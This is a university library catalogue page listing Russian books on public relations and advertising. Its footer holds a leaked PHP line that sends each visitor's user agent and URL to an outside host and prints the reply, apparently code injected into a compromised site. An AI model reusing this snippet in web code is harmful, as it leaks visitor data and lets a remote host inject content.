Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

48 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=PR")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 485
1. 
Моисеев, Вячеслав Анатольевич. Паблик рилейшнз [Текст] : Теория и практика / В. А. Моисеев, 1999. - 375 с.
Держатели документа (Информация об экземплярах) 
2. 
Королько, Валентин Григорьевич. Основы паблик рилейшнз [Текст] : Учеб. для высш. заведений образования / В. Г. Королько; Науч. ред. О. В. Некрасова, 2001. - 527 с.
Держатели документа (Информация об экземплярах) 
3. 
Реклама и PR [Текст] : Библиогр. указ.: Кн. на рус. и иностр. яз.: Учеб. пособие по специальности "Реклама" / РГБ, Междунар. ин-т рекламы, 2001. - 183, [1] с.
Держатели документа (Информация об экземплярах) 
4. 
Моисеев, Вячеслав Анатольевич. Паблик рилейшнз [Текст] : Теория и практика / В. А. Моисеев, 2001. - 375 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
5. 
V Всероссийская конференция заведующих кафедрами рекламы, связей с общественностью и смежных специальностей [Текст] : Сб. материалов, Москва, 13-14 апр. 2001 г. / Под ред. В. А. Евстафьева, 2001. - 143 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
6. 
Рекламная деятельность [Текст] : Учеб. для вузов / Ф. Г. Панкратов, Ю. К. Баженов, Т. К. Серегина, В. Г. Шахурин, 2002. - 361, [1] с.
Держатели документа (Информация об экземплярах) 
7. 
Ромат, Евгений Викторович. Реклама [Текст] : Учеб. пособие / Е. В. Ромат, 2002. - 168 с.
Держатели документа (Информация об экземплярах) 
8. 
Джефкинс, Френк. Реклама [Текст] : Учеб. пособие для вузов по специальности 350700 - Реклама / Ф. Джефкинс; Пер. с англ. Г. Ю. Любимовой и др.; Под ред. Б. Л. Еремина, 2002. - 523 с.
Держатели документа (Информация об экземплярах) 
9. 
Репьев, Александр Павлович. Рекламодателю о рекламе [Текст] : По специальности "Реклама" / А. П. Репьев, 2001. - 239, [1] с.
Держатели документа (Информация об экземплярах) 
10. 
Буари, Филипп А. Паблик рилейшнз, или Стратегия доверия [Текст] / Ф. А. Буари; Науч. ред.: А. П. Ситников, Т. Ю. Лебедева; Пер. с фр. Н. С. Добробабенко, 2001. - 177 с.
Держатели документа (Информация об экземплярах) 
11. 
Бодуан, Жан-Пьер. Управление имиджем компании. Паблик рилейшнз: предмет и мастерство [Текст] / Ж. Бодуан; А. П. Ситников, Т. Ю. Лебедева, А. В. Полунин, 2001. - 232 с.
Держатели документа (Информация об экземплярах) 
12. 
PR: международная практика [Текст] / Пер. с англ. Т. В. Астаховой, Н. В. Солнцевой, 1997. - 172 с.
13. 
Пашенцев, Евгений Николаевич. Паблик рилейшнз: от бизнеса до политики [Текст] / Е. Н. Пашенцев, 2000. - 230 с.
Держатели документа (Информация об экземплярах) 
14. 
III Всероссийская конференция заведующих кафедрами рекламы и смежных специальностей [Текст] : Сб. материалов, 26-27 апр. 1999 г. / В. А. Евстафьев, 1999. - 162 с.
Держатели документа (Информация об экземплярах) 
15. 
Чумиков, Александр Николаевич. Связи с общественностью [Текст] : Учеб. пособие для управленч. специальностей вузов / А. Н. Чумиков, 2001. - 295 с.
Держатели документа (Информация об экземплярах) 
16. 
Музыкант, Валерий Леонидович. Реклама и PR - технологии в бизнесе, коммерции, политике [Текст] : Учеб. пособие для вузов по специальностям: "реклама", "паблик рилейшнз", "маркетинг", "журналистика" / В. Л. Музыкант, 2001. - 686 с.
Ключевые слова 
Реклама -- Учебник и пособие * -- Рекламная кампания -- Паблик рилейшнз -- Политическая реклама -- БИЗНЕС РЕКЛАМНЫЙ -- ПАБЛИК РИЛЕЙШНЗ -- ПОЛИТИКА МАРКЕТИНГОВАЯ -- РЕКЛАМА ПОЛИТИЧЕСКАЯ -- СМИ - реклама -- Реклама - СМИ -- ЭЛЕКТОРАТ -- ИМИДЖ ПОЛИТИЧЕСКИЙ -- ЛИДЕР ПОЛИТИЧЕСКИЙ -- СЕГМЕНТИРОВАНИЕ -- ПОЗИЦИОНИРОВАНИЕ ТОВАРА -- ПОЛИТИКА ЦЕНОВАЯ -- ПРОМОУШН -- ЦИКЛ ЖИЗНЕННЫЙ ТОВАРА -- ПСИХОЛОГИЯ ПОТРЕБИТЕЛЯ -- РЕКЛАМА - ПРАВО -- РЕКЛАМА - ПСИХОЛОГИЯ -- РЕКЛАМА - ЭТИКА -- ТЕСТЫ - РЕКЛАМА -- РЕКЛАМА - СЛОВАРЬ ТЕРМИНОВ
17. 
Лукашев, Анатолий Викторович. Анатомия демократии, или Черный PR как институт гражданского общества [Текст] / А. В. Лукашев, А. В. Пониделко, 2001. - 268 с.
Держатели документа (Информация об экземплярах) 
18. 
Борисов, Борис Леонидович. Технология рекламы и PR [Текст] : Учеб. пособие / Б. Л. Борисов, 2001. - 617, [1] с.
Ключевые слова 
Реклама -- Паблик рилейшнз -- Маркетинговая коммуникация -- Товарный знак -- Бренд -- Франчайзинг -- Сми -- Средства массовой информации -- Имидж -- Стиль -- Pr -- Брендинг -- Учебник и пособие -- Crisis management -- ИНТЕРНЕТ - МАРКЕТИНГ -- БРЕНД -- БРЕНДИНГ -- ФРАНЧАЙЗИНГ -- ЗНАК ТОВАРНЫЙ -- СИМВОЛ -- СИМВОЛИКА -- РЕКЛАМА ПОЛИТИЧЕСКАЯ -- ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ -- СРЕДСТВА МАССОВОЙ ИНФОРМАЦИИ -- СОЦИОЛОГИЯ прикладная -- МЕДИАПЛАНИРОВАНИЕ -- Фокус-группа -- МИФ -- ТОТАЛИТАРИЗМ -- ТЕЛЕРЕКЛАМА -- ИМИДЖМЕЙКЕР -- Маркетинг политический -- ИМИДЖ политический -- СТИЛЬ фирменный -- СТИЛЬ русский -- Типографика -- Кич - Реклама -- Модерн - Реклама -- ПОСТМОДЕРНИЗМ - Реклама -- АВАНГАРД - Реклама -- АВАНГАРД РУССКИЙ -- Кинореклама -- СТИЛЬ жизни -- Монтаж -- КЛИП -- Юмор - Реклама -- Семиотика -- Структурализм -- РЕКЛАМА - СЛОВАРЬ ТЕРМИНОВ
19. 
Связи с общественностью в политике и государственном управлении [Текст] / М. Г. Анохин, М. Д. Валовая, В. М. Горохов; В. С. Комаровский, 2001. - 520 с.
Держатели документа (Информация об экземплярах) 
20. 
Арнольд, Николай. Тринадцатый нож в спину российской рекламе и public relations [Текст] / Н. Арнольд, 1997. - 219 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3222 - 05.04.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 2.07 с.12 запросов, 1.04c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;